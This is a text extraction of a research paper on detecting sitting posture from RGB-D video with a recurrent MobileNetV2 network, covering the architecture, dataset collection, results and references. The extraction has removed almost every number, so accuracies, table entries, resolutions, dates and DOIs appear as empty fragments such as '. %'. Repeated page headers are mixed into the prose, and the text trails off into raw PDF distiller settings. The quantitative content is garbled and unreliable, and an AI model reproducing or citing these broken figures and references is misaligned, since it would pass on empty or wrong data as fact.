fed into depth-wise convolutional block (zhang et al., ), which reduces the dimensionality of each frame by a factor of two, without losing each individual channel’s influence on the output. this is due to depth-wise convolutions applying separate kernels for each channel. this is then followed by a convolutional layer in order to extract the best individual features, which is followed by a second dimensionality reduction layer. we do this because our input frames are captured at × px resolution, which is the maximum hardware resolution of the intel realsense d i device. reducing the dimensionality twice leaves us with features, each of × px resolution. at this stage, we use long short term memory (lstm) convolutional block (xu et al., ; li et al., ), which is tasked to extract most useful features in the entire sequence. figure our recurrent hierarchical ann architecture using mobilenetv as the main backbone. it takes the rgb-d frame sequence as input and outputs the flattened prediction tree as a result. full-size doi: . /peerj-cs. /fig- kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for our main neural network backbone, we use mobilenetv , which is the extension of mobilenet, for it has show to achieve great results in predictive capabilities (howard et al., ; zhou et al., ), however, the architecture itself is relatively light-weight for it is designed to be used in low power devices such as mobile devices, unlike for example, yolov , which while having impressive recall results (redmon & farhadi, ), is much more complex and has a substantially poorer performance. the mobilenetv output is then connected to a global average pooling layer in order to reduce dimensionality and improve generalization rate (zhou et al., ). finally, the output is subsequently connected to a fully-connected layer, which represents the flattened representation of posture state prediction hierarchy, which can be seen in fig. . our entire ann setup can be seen in table . after each of two bottleneck layers we additionally use spatial dropout layers as it is shown to improve generalization during training and reduce the effect of nearby pixels being strongly correlated within the feature maps (murugan & durairaj, ), each with dropout probability of . , whereas the spatial dropout post lstm cell has a dropout probability of . , because the higher the network is upstream the more dropout layers influence the entire network, therefore high values upstream may cause the network to be more unstable and difficult to train. the dropout layer before the output layer however, has a dropout probability of %. aggressive dropout values reduce the chance that the model is will overfit by training on noise instead of image features. all our previous layers up to this point had used rectified linear unit as our activation function in order to impose non-linearity into our model for it has shown better results and improved performance due to its mathematical simplicity in cnns (hanin, ). however, for the last layer we opted to use the sigmoid activation due to our network outputting hierarchical values and acting as multi-label classifier, while the softmax activation is more useful for multi-class classification tasks. figure flattened hierarchy representation of postures expanded into a hierarchical tree. full-size doi: . /peerj-cs. /fig- kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithm of sitting posture detection figure depicts algorithm of our enhanced posture detection solution. process starts with the initialization of model weights for sorting out the rgb-d camera output (both depth and rgb as varying on the condition either modality can provide compensation features). algorithm then tries to reconstruct intermediate frame for retrieval and analysis of frame semantics, which are then used for stack validity status verification. assuming the condition, analysis starts in the recurrent layers of our modified mobilenet v architecture, with pareto-optimal berparameter optimization (plonis et al., ). the model then assigns prediction labels and algorithm further tries to improve the quality by firing smart semantic prediction analyzer, checking not only the output value but probable output status for a combined confidence level of < %, as an improved determinator for further frame semantic analysis. a final validity status is then initiated, depending on condition leading to a majority voting and a very reliable detection of bad posture. algorithm was designed to work continuously and is able to automatically stop processing to stay compatible with green computing paradigm (okewu et al., ) to save energy. prediction of posture states we adopted the semantic matchmaking approach (ruta et al., ) to describe the semantic relationship between different postures using an ontological tree for analysis, reasoning and knowledge discovery. in order to extract the specific prediction label we parse the posture hierarchy tree (fig. ), first, by checking, which posture state is most likely according to the neural network. once we know, which posture type is most likely to be represented in the frame sequence, we proceed to the sub-nodes and check their predictions. we continue this search until we find the leaf node, which represents the actual label. this approach allows us to filter out the most likely path that is seen in the frames. this is helpful in cases when the similarities between postures is large. table layers of the proposed neural network architecture for human posture recognition. type filters size output input – – t × × depthwise convolution – × / t × × convolution × t × × spatial dropout p(x) = . – t × × depthwise convolution – × / t × × convolution × t × × spatial dropout p(x) = . – t × × lstm convolution × × spatial dropout p(x) = . – × mobilenetv – – × global average pooling – – , dropout p(x) = . – , fully-connected (sigmoid) – – kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for example, all forward postures share the same characteristics—shoulders are not at degree angle, and the head is positioned forward with respect to the body. this allows us to ignore all the weight influences, where for example, the person is lying down. additionally, the further down the tree the label leaves are the less of an overall recall error is, due to each level of the tree being ontologically similar, for example, predicting lying down, instead of partially lying down is a smaller error than predicting hunched over. loss function one of the reasons why we use the flattened final layer to represent our posture hierarchy is because we can represent our problem as multi-label classification (wang et al., ). this allows us to use binary cross-entropy (eq. ( )) in order to calculate the loss between expected output and ground truth: hp ¼ xn i¼ ŷi � logðyiÞ þ ð � ŷiÞ � logð � yiÞ ( ) figure activity diagram of the proposed method for sitting posture state recognition. full-size doi: . /peerj-cs. /fig- kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ binary cross-entropy classifier is fit for our multi-label classification task (wu et al., ) as each of our cells output is a binary one and more than one cell can be positive at a time, depending on how deep the classification is, as opposed to the categorical cross- entropy, which is a solution for multi-class tasks, where the input can yield only a single- class output. network training for training a neural network various optimization methods have been proposed. however, one of the most popular optimization methods due to its computational efficiency allowing training ann on large datasets more easily on weaker hardware in addition to the ability to achieve faster convergence than other methods is adam (kingma & ba, ). for these reasons, we had opted to use adam for training using the initial training rate of e− , with a batch size of eight. additionally, we perform data augmentation as it has shown to improve ann generalization (fawzi et al., ). we perform horizontal image flipping in order to increase the view count, and perform random hue and saturation changes, aiming to increase stability against different lightning conditions as all of our video sequence instances were recorded during same time frame, therefore, maintaining nearly identical lightning. in all cases, the identical augmentation values are used for all images in the same series with the same probability of performing image flipping, hue and saturation augmentation being % independently. random hue shift is performed in the range of h = [ , π) radians, while the saturation has the random range of s = [ , ]. data collection anns have the benefit of doing all the heavy work upfront during the training therefore, allowing to improve system runtime by reducing the number of required calculations (holden et al., ). however, this approach depends on the quality of the training data, which can be defined in terms of the size of available samples, class balance and even the correctness of the labels. our approach depends on both color and depth information. unfortunately, still there are no publicly available labeled human posture dataset that additionally provides depth information. for our experiments, we have devised a methodology to create such dataset. the data collection procedure consists of two stages. stage i the person starts by sitting up straight. this position is then filmed for s. afterwards, the person is instructed to lightly hunch forward, which is followed by another s of sitting in this position. afterwards, the person is again instructed to hunch more, emulating their average hunching posture. after the filming, the subject is instructed once more to hunch forward in order to emulate the worst possible forward posture. once the s have been recorded in this posture, the person is then instructed to sit up straight for an additional s to get used to this position. then, we start emulating the bad backwards posture, i.e., lying down in the chair. the person is instructed to kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ partially lie in the chair for s, after which he/she is instructed to do it twice more in increasingly bad posture positions giving us three sets of bad forward and backward posture examples. stage ii the person is instructed to initially sit up straight. then the person is instructed to start slowly counting from one to five, while slowly worsening their forward posture. when the person finishes counting, he/she is expected to be in the worst forward posture they imagine. afterwards, the subject returns to straight position. this action is repeated for five times. once the forward posture data is recorded, the person is asked to perform the similar action, this time with backwards posture, where once again when they finish counting, they are fully lying in the chair. each of the stages is recorded three separate times using different camera perspectives at o’clock, o’clock and o’clock. the person is filmed in front of the computer desk and during the filming they are asked to interact with the table in their current posture how they imagine they would sit on the table. this can range from drawing on a piece of article, to checking the drawers, using keyboard or even holding their head with their hand. when collecting our dataset, we asked subjects (seven men and four women) to perform the posture emulation tasks. the informed consent was obtained, while we followed strictly the requirements of the helsinki declaration. the research was approved by the institutional review board, faculty of informatics, kaunas university of technology ( - - no. ifep - ). further expansion of dataset to include different body types or disabilities may additionally improve the results in more real world cases. data labelling once the data is collected it must be labeled manually. however, one of the issues when labeling data we have noticed that has caused some of the data points to be thrown out completely is for a person to actually differentiate properly what posture that person is in. even though the filming took in relatively discrete time intervals, some subjects may take longer/shorter to perform specified actions, they may attempt to fix their posture due to it being uncomfortable for them, etc. additionally, some people have indiscernible sitting straight and lightly hunched posture, as their normal posture is already biased towards leaning head forward. therefore, the labeling of such data is a challenge due to its subjectiveness as bad data labels may poison the network and cause it to overfit instead of generalizing. using our recorded dataset, we have extracted these labels: sitting straight, lightly hunched, hunched over, extremely hunched, partially lying and lying down. while we have three backwards posture angles, we opted for only two backwards posture labels as it is difficult to objectively measure lying down and extremely lying down as in multiple cases subjects barely made any movements. kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dataset our dataset consists of different captured video sequence instances totaling min of recording, which we split into individual labeled frames. we used -fold cross- validation. for training, we had split the data from each individual in : ratio instead of splitting the frames, as this gives more objective results, because similar frames from the same captured video will not be a part of evaluation, thus artificially increasing the recall rate. we can see the number of frames in training and testing frames in table , additionally we can see that dataset is slightly skewed towards sitting straight and lying down due to the dataset being not completely balanced. while class imbalance may cause issues in generalization of the network, we believe that the imbalance is not high enough to have a noticeable impact. finally, the examples of images in the dataset are given in table (right side view). the subjects presented in the images have provided their informed consent for publication of identifying images in an online open-access publication. results accuracy we evaluate the prediction correctness against ground truth in two stages: using final prediction labels (sitting straight, lightly hunched, hunched over, extremely hunched, partially lying, lying down); and intermediate branch predictions (forward posture, backward posture, straight posture). this provides us better insight on the prediction results as this will show both absolute error and intermediate branch error. the confusion matrix for the first case can be seen in fig. . in the first case, we achieved an accuracy of . %, sensitivity of . , specificity of . and f-score of . . note that the network has achieved a high specificity rate, which means that it can effectively recognize the subjects, who do not have the posture problems. as we can see from the confusion matrix (fig. ), the biggest issues arise in prediction regarding hunched over and extremely hunched labels. the proposed network model had a hard time discerning between these two values. this indicates that either our dataset for these two labels have little variation and the positions are very similar, or that one of the labels has been mislabeled and has poisoned the predicted values. this suggests that further investigation in our dataset is definitely needed. table frame count in the dataset. posture class training testing dataset (%) sitting straight . lightly hunched . hunched over . extremely hunched . partially lying . lying down . kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table examples of images in dataset (right side view). posture class rgb and depth images sitting straight lightly hunched forward hunched over forward extremely hunched forward partially lying down in the chair (continued) kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ however, all largest misclassification values occur between neighbouring classes (extremely hunched vs hunched over— . %), (hunched over vs extremely hunched— . %), (partially lying vs lying down— . %), (lying down vs partially lying— . %), suggesting that perhaps the need for some fuzzification of class definitions and interpretation of results, or that these posture classes should be combined. our dataset depends on the expert interpretation of what they are seeing in the camera, which may be the cause of this disparity. performing data labeling by more experts may improve the results as this would reduce the ambiguity in our dataset that we have due to a limited number of experts labeling the data. however, the network is accurate enough that it can suggest the labels in further labeling processing. this would change our solution from being supervised machine learning into semi-supervised or even completely figure confusion matrix indicating expected labels versus network predictions. accuracy values are given in percents. diagonal values indicate correct predictions. full-size doi: . /peerj-cs. /fig- table (continued) posture class rgb and depth images lying down in the chair kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ unsupervised machine learning approach. notwithstanding, this is beyond the scope of our research. however, if we investigate further we can see from fig. that the root posture prediction has better results, where the network model manages to generalize between forward posture, backward posture and straight posture cases. this partial confusion matrix (fig. ) makes it clear that while some finer detail in our dataset is less objective and is difficult for the network to generalize, the neural network itself is adept in solving the classification of the base postures with the mean accuracy rate of . % (sensitivity . , specificity . , f-score . and kappa . ). the bottom level (root) labels are more than enough in a lot of cases when it comes to posture recognition tasks that do not require precise user angle extraction. additionally, when comparing partial and full confusion matrices we can see that the deeper levels additionally have lower false negative results, indicating the addition of the hierarchical structure for prediction can inherently improve the prediction results in deeper levels due to the semantic connections between labels. performance due to fact that our approach uses mobilenetv as the backbone for our ann that means that is lightweight and can be used in real-time applications. our method performs a posture prediction on average in ms (which corresponds to fps rate) on a workstation with the following specifications: intel i - cpu with gb of ram, nvidia gpu with gb of gddr vram. comparison we compare our results with the results of other authors in table . figure confusion matrix indicating bottom level expected labels versus network predictions. accuracy values are given in percents. diagonal values indicate correct predictions. full-size doi: . /peerj-cs. /fig- kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ our method allows to achieve the real time sitting posture recognition with the same or better recognition accuracy and video resolution than other similar state-of-the-art methods. for example, wang et al. ( ) achieved higher accuracy and recognition rate, however their method require the visibility of full skeleton detected by kinect sensors and not occluded by any obstacles. gochoo et al. ( , ) achieved a very high recognition rate using three low resolution thermal sensors placed around the subject to recognize eight postures and yoga postures, respectively, but no occlusions were allowed either. tariq et al. ( ) used kinect and additional motion sensors from smartwatch to achieve the required level of accuracy. discussion the training of neural network depends on hardware used for recording. we used intel realsense d i, but the results may be worse when using different hardware, for example, kinectv as these two devices produce different noise in their depth fields. this may cause the network to have poorer results when compared to the one that it has been trained on. however, we are not able to validate this claim. additionally, when testing the network using the real-time camera feed we had noticed that while relatively similar and their mirror image angles work it may have lower precision rates with something more extreme like placing sensor very high or very low relative to the table or user. finally, when using in real world application, one of the measures to improve prediction stability is to use majority voting on the preceding video frames. this is performed by taking the prediction label that had appeared the most times in the previous recorded frames. this technique can improve the stability of the predictions as a single video frame will no longer change the prediction results. however, the predictions will have a delay, due to previous video frames influencing the result for a short period of time. table comparison of posture recognition methods. method frame resolution, px frame rate, fps accuracy, % task reference real-time deformable detector × . hand posture recognition hernandez-belmonte & ayala-ramirez ( ) ensemble of inceptionresnetv × n/a . four postures (standing, sitting, lying, and lying crouched) byeon et al. ( ) lvq (learning vector quantization) neural network × . five full-skeleton postures (standing, sitting, stooping, kneeling, and lying) wang et al. ( ) multi-stage convolutional neural network (m-cnn) n/a . two postures for fall detection zhang, wu & wang ( ) lvq neural network × . eight postures (stand, hand raise, akimbo, open wide arms, squat, toe touch, crawl, and lie) gochoo et al. ( ) deep cnn × . yoga postures gochoo et al. ( ) d cnn n/a n/a . detection of standstill body poses. liu et al. ( ) deep recurrent hierarchical network × . spine posture recognition while sitting this paper note: n/a, data is not available. kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ another limitation of this study is a small number of subjects ( ), all healthy, which may have influenced the validity of the results. the age range and gender diversity of the subject group was limited. in future, we will have to extend the subject group to include various professional/occupational groups as well as school children and adolescents as well as people with different body types and disabilities in order to improve the results for real world cases. conclusion we have proposed an extension of the mobilenetv neural network, which allows the use of sequential video data as an input, therefore, allowing for the deep neural network to extract important temporal features from video frames, which would otherwise be lost when compared to a single-frame classification while still being capable of the single-frame prediction due to being biased towards the last frame. we have improved the top-layer of the mobilenetv architecture by adding the hierarchical data representation, which acts as a semantic lock for top-level label classification by filtering out the invalid class labels early. additionally, we have performed a pilot study based in which we suggest the methodology required to collect the training dataset and validation datasets. further improvements in dataset collection methodology can be made in order to account for different body shapes, disabilities and removing labeling ambiguities. the proposed posture classification approach is highly extensible due to its flattened tree representation, which can be easily adapted to the already existing posture classification tasks with the depth of the ontological semantic posture model being one of the driving factors for classification quality. based on our validation data giving us a classification accuracy of . % in predicting three main sitting posture classes (backward posture, forward posture and straight posture) at a rate of fps. finally, unlike in related work, our method does not depend on the skeletal predictors, therefore we can perform the sitting human posture prediction when only as low as % of the human torso is visible in the frame. for these reasons, we believe that our approach is more robust for real-time human posture classification tasks in the real-world office environment. acknowledgements we thank the honorable research prof. s. misra (turkey) for tuning our model for green computing awareness, prof. a. lawrinson (usa) for his inspiration of semantical frame analysis, and the team of prof. m. von gleiwitz and d. pollack (argentina) for their suggestions of the pareto optimization method to improve mobilenet performance. additional information and declarations funding the authors received no funding for this work. competing interests robertas damaševičius is an academic editor for peerj. kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ author contributions � audrius kulikajevas conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � rytis maskeliunas conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � robertas damaševičius analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the research was approved by the institutional review board, faculty of informatics, kaunas university of technology (no. ifep - ). data availability the following information was supplied regarding data availability: data and code are available on github: https://github.com/realratchet/sitstraightnet references abobakr a, hossny m, nahavandi s. . a skeleton-free fall detection system from depth images using random decision forest. ieee systems journal ( ): – doi . /jsyst. . . afza f, khan ma, sharif m, kadry s, manogaran g, saba t, ashraf i, damaševičius r. . a framework of human action recognition using length control features fusion and weighted entropy-variances based feature selection. image and vision computing : . alam f, mehmood r, katib i, altowaijri sm, albeshri a. . taawun: a decision fusion and feature specific road detection approach for connected autonomous vehicles. mobile networks and applications ( ): doi . /s - - - . alberdi a, aztiria a, basarab a, cook dj. . using smart offices to predict occupational stress. international journal of industrial ergonomics ( ): – doi . /j.ergon. . . . arnold d, li x, lin y, wang z, yi w, saniie j. . iot framework for d body posture visualization. ieee international conference on electro information technology : – . bei s, xing z, taocheng l, qin l. . sitting posture detection using adaptively fused d features. in: ieee nd information technology, networking, electronic and automation control conference. piscataway: ieee, – . bibbo d, carli m, conforto s, battisti f. . a sitting posture monitoring instrument to assess different levels of cognitive engagement. sensors (switzerland) ( ): doi . /s . bouvier b, duprey s, claudon l, dumas r, savescu a. . upper limb kinematics using inertial and magnetic sensors: comparison of sensor-to-segment calibrations. sensors ( ): – doi . /s . kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/realratchet/sitstraightnet http://dx.doi.org/ . /jsyst. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.ergon. . . http://dx.doi.org/ . /s http://dx.doi.org/ . /s http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ byeon y-h, lee j-y, kim d-h, kwak k-c. . posture recognition using ensemble deep models under various home environments. applied sciences ( ): doi . /app . cagnie b, danneels l, tiggelen dv, loose vd, cambier d. . individual and work related risk factors for neck pain among office workers: a cross sectional study. european spine journal ( ): – doi . /s - - - . camalan s, sengul g, misra s, maskeliunas r, damaševičius r. . gender detection using d anthropometric measurements by kinect. metrology and measurement systems ( ): – . chen h, dou q, yu l, qin j, heng p. a. voxresnet: deep voxelwise residual networks for brain segmentation from d mr images. neuroimage : – doi . /j.neuroimage. . . . chen y, yu l, ota k, dong m. b. robust activity recognition for aging society. ieee journal of biomedical and health informatics ( ): – doi . /jbhi. . . chin lck, eu ks, tay tt, teoh cy, yap km. . a posture recognition model dedicated for differentiating between proper and improper sitting posture with kinect sensor. in: have, —ieee international symposium on haptic, audio-visual environments and games, proceedings. dias d, cunha jps. . wearable health devices—vital sign monitoring, systems and technologies. sensors ( ): doi . /s . fawzi a, samulowitz h, turaga d, frossard p. . adaptive data augmentation for image classification. in: ieee international conference on image processing (icip). piscataway: ieee, – . garcía patiño a, khoshnam m, menon c. . wearable device to monitor back movements using an inductive textile sensor. sensors ( ): . gochoo m, tan t-h, batjargal t, seredin o, huang s-c. . device-free non-privacy invasive indoor human posture recognition using low-resolution infrared sensor-based wireless sensor networks and dcnn. in: ieee international conference on systems, man, and cybernetics. piscataway: ieee. gochoo m, tan t-h, huang s-c, batjargal t, hsieh j-w, alnajjar fs, chen y-f. . novel iot-based privacy-preserving yoga posture recognition system using low-resolution infrared sensors and deep learning. ieee internet of things journal ( ): – doi . /jiot. . . grandjean e, hünting w. . ergonomics of posture—review of various problems of standing and sitting posture. applied ergonomics ( ): – doi . / - ( ) - . graves a, mohamed a, hinton g. . speech recognition with deep recurrent neural networks. in: ieee international conference on acoustics, speech and signal processing. piscataway: ieee, – . hanin b. . universal function approximation by deep neural nets with bounded width and relu activations. mathematics ( ): doi . /math . hernandez-belmonte u, ayala-ramirez v. . real-time hand posture recognition for human-robot interaction tasks. sensors ( ): doi . /s . hirasawa t, aoyama k, tanimoto t, ishihara s, shichijo s, ozawa t, ohnishi t, fujishiro m, matsuo k, fujisaki j, tada t. . application of artificial intelligence using a convolutional neural network for detecting gastric cancer in endoscopic images. gastric cancer ( ): – doi . /s - - - . ho esl, chan jcp, chan dck, shum hph, cheung y, yuen pc. . improving posture classification accuracy for depth sensor-based human activity monitoring in smart kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /app http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /jbhi. . http://dx.doi.org/ . /s http://dx.doi.org/ . /jiot. . http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /math http://dx.doi.org/ . /s http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ environments. computer vision and image understanding ( ): – doi . /j.cviu. . . . holden d, duong bc, datta s, nowrouzezahrai d. . subspace neural physics: fast data-driven interactive simulation. in: sca ' : proceedings of the th annual acm siggraph/eurographics symposium on computer animation. hondori hm, khademi m. . a review on technical and clinical impact of microsoft kinect on physical therapy and rehabilitation. journal of medical engineering : – . howard ag, zhu m, chen b, kalenichenko d, wang w, weyand t, andreetto m, adam h. . mobilenets: efficient convolutional neural networks for mobile vision applications. arxiv. available at http://arxiv.org/abs/ . v . huang x, gao l. . reconstructing three-dimensional human poses: a combined approach of iterative calculation on skeleton model and conformal geometric algebra. symmetry ( ): doi . /sym . huang j, hsu s, huang c. . human upper body posture recognition and upper limbs motion parameters estimation. in: asia-pacific signal and information processing association annual summit and conference. – . jankovic j, mcdermott m, carter j, gauthier s, goetz c, golbe l, huber s, koller w, olanow c, shoulson i, stern m, tanner c, weiner w. . variable expression of parkinson’s disease: a base-line analysis of the datatop cohort. neurology ( ): – doi . /wnl. . . . ji b, hong ej. . deep-learning-based real-time road traffic prediction using long-term evolution access data. sensors ( ): doi . /s . jiang m, kong j, bebis g, huo h. . informative joints based human action recognition using skeleton contexts. signal processing: image communication ( ): – doi . /j.image. . . . kamilaris a, prenafeta-boldú fx. . deep learning in agriculture: a survey. computers and electronics in agriculture ( ): – doi . /j.compag. . . . keselman l, woodfill ji, grunnet-jepsen a, bhowmik a. . intel(r) realsense(tm) stereoscopic depth cameras. in: ieee conference on computer vision and pattern recognition workshops (cvprw). piscataway: ieee. kingma dp, ba j. . adam: a method for stochastic optimization. corr. available at http://arxiv.org/abs/ . . li b, bai b, han c. . upper body motion recognition based on key frame and random forest regression. multimedia tools and applications ( – ): – doi . /s - - -y. li y, shen l. . skin lesion analysis towards melanoma detection using deep learning network. sensors ( ): doi . /s . li y, xu h, bian m, xiao j. . attention based cnn-convlstm for pedestrian attribute recognition. sensors ( ): doi . /s . liu c, chen l-c, schroff f, adam h, hua w, yuille al, fei-fei l. . auto-deeplab: hierarchical neural architecture search for semantic image segmentation. in: the ieee conference on computer vision and pattern recognition (cvpr). piscataway: ieee. liu j, wang y, liu y, xiang s, pan c. . d posturenet: a unified framework for skeleton- based posture recognition. pattern recognition letters ( ): – doi . /j.patrec. . . . kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.cviu. . . http://arxiv.org/abs/ . v http://dx.doi.org/ . /sym http://dx.doi.org/ . /wnl. . . http://dx.doi.org/ . /s http://dx.doi.org/ . /j.image. . . http://dx.doi.org/ . /j.compag. . . http://arxiv.org/abs/ . http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /s http://dx.doi.org/ . /s http://dx.doi.org/ . /j.patrec. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ma c, li w, cao j, du j, li q, gravina r. . adaptive sliding window based activity recognition for assisted livings. information fusion ( ): – doi . /j.inffus. . . . maskeliunas r, damaševičius r, segal s. . a review of internet of things technologies for ambient assisted living environments. future internet ( ): doi . /fi . matthew rp, seko s, bailey j, bajcsy r, lotz j. . estimating sit-to-stand dynamics using a single depth camera. ieee journal of biomedical and health informatics ( ): – doi . /jbhi. . . murugan p, durairaj s. . regularization and optimization strategies in deep convolutional neural network. corr. available at http://arxiv.org/abs/ . . nweke hf, teh yw, mujtaba g, al-garadi ma. . data fusion and multiple classifier systems for human activity detection and health monitoring: review and open research directions. information fusion (part ): – doi . /j.inffus. . . . okewu e, misra s, maskeliunas r, damasevicius r, fernandez-sanz l. . optimizing green computing awareness for environmental sustainability and economic security as a stochastic optimization problem. sustainability ( ): doi . /su . perusquía-hernández m, enomoto t, martins t, otsuki m, iwata h, suzuki k. . embodied interface for levitation and navigation in a d large space. in: acm international conference proceeding series. new york: acm. pham hh, salmane h, khoudour l, crouzil a, zegers p, velastin sa. . spatio—temporal image representation of d skeletal movements for view-invariant action recognition with deep convolutional neural networks. sensors ( ): doi . /s . plonis d, katkevicius a, gurskas a, urbanavicius v, maskeliunas r, damasevicius r. . prediction of meander delay system parameters for internet-of-things devices using pareto- optimal artificial neural network and multiple linear regression. ieee access : – doi . /access. . . redmon j, farhadi a. . yolov : an incremental improvement. corr. available at http://arxiv.org/abs/ . . ruta m, scioscia f, di summa m, ieva s, sciascio ed, sacco m. . semantic matchmaking for kinect-based posture and gesture recognition. in: ieee international conference on semantic computing. piscataway: ieee. ryselis k, petkus t, blažauskas t, maskeliūnas r, damaševičius r. . multiple kinect based system to monitor and analyze key performance indicators of physical training. human-centric computing and information sciences ( ): . saab ss, msheik h. . novel rfid-based pose estimation using single stationary antenna. ieee transactions on industrial electronics ( ): – doi . /tie. . . sandler m, howard a, zhu m, zhmoginov a, chen l. . mobilenetv : inverted residuals and linear bottlenecks. in: ieee/cvf conference on computer vision and pattern recognition. piscataway: ieee, – . sengupta a, jin f, zhang r, cao s. . mm-pose: real-time human skeletal posture estimation using mmwave radars and cnns. ieee sensors journal ( ): – doi . /jsen. . . sharma m, majumdar pk. . occupational lifestyle diseases: an emerging issue. indian journal of occupational and environmental medicine ( ): – doi . / - . . sundermeyer m, ney h, schluter r. . from feedforward to recurrent lstm neural networks for language modeling. ieee/acm transactions on audio, speech, and language processing ( ): – doi . /taslp. . . kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.inffus. . . http://dx.doi.org/ . /fi http://dx.doi.org/ . /jbhi. . http://arxiv.org/abs/ . http://dx.doi.org/ . /j.inffus. . . http://dx.doi.org/ . /su http://dx.doi.org/ . /s http://dx.doi.org/ . /access. . http://arxiv.org/abs/ . http://dx.doi.org/ . /tie. . http://dx.doi.org/ . /jsen. . http://dx.doi.org/ . / - . http://dx.doi.org/ . /taslp. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ tariq m, majeed h, beg mo, khan fa, derhab a. . accurate detection of sitting posture activities in a secure iot based assisted living environment. future generation computer systems ( ): – doi . /j.future. . . . wang w-j, chang j-w, haung s-f, wang r-j. . human posture recognition based on images captured by the kinect sensor. international journal of advanced robotic systems ( ): doi . / . wang j, zhang j, cai y, deng l. . deepmir go: inferring functions of human micrornas using a deep multi-label classification model. international journal of molecular sciences ( ): doi . /ijms . wen l, li x, gao l, zhang y. . a new convolutional neural network-based data-driven fault diagnosis method. ieee transactions on industrial electronics ( ): – doi . /tie. . . wu g, shao x, guo z, chen q, yuan w, shi x, xu y, shibasaki r. . automatic building segmentation of aerial imagery using multi-constraint fully convolutional networks. remote sensing ( ): doi . /rs . xu s, guo j, zhang g, bie r. . automated detection of multiple lesions on chest x-ray images: classification using a neural network technique with association-specific contexts. applied sciences ( ): doi . /app . zemp r, tanadini m, plüss s, schnüriger k, singh nb, taylor wr, lorenzetti s. . application of machine learning approaches for classifying sitting posture based on force and acceleration sensors. biomed research international ( ): – doi . / / . zhang z. . microsoft kinect sensor and its effect. ieee multimedia ( ): – doi . /mmul. . . zhang j, wu c, wang y. . human fall detection based on body posture spatio-temporal evolution. sensors ( ): doi . /s . zhang t, zhang x, shi j, wei s. . depthwise separable convolution neural network for high-speed sar ship detection. remote sensing ( ): doi . /rs . zhou b, khosla a, lapedriza a, oliva a, torralba a. . learning deep features for discriminative localization. in: ieee conference on computer vision and pattern recognition. piscataway: ieee, – . zhou j, tian y, yuan c, yin k, yang g, wen m. . improved uav opium poppy detection using an updated yolov model. sensors ( ): doi . /s . kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . / http://dx.doi.org/ . /ijms http://dx.doi.org/ . /tie. . http://dx.doi.org/ . /rs http://dx.doi.org/ . /app http://dx.doi.org/ . / / http://dx.doi.org/ . /mmul. . http://dx.doi.org/ . /s http://dx.doi.org/ . /rs http://dx.doi.org/ . /s https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. detection of sitting posture using hierarchical image composition and deep learning introduction related work methods results discussion conclusion flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true 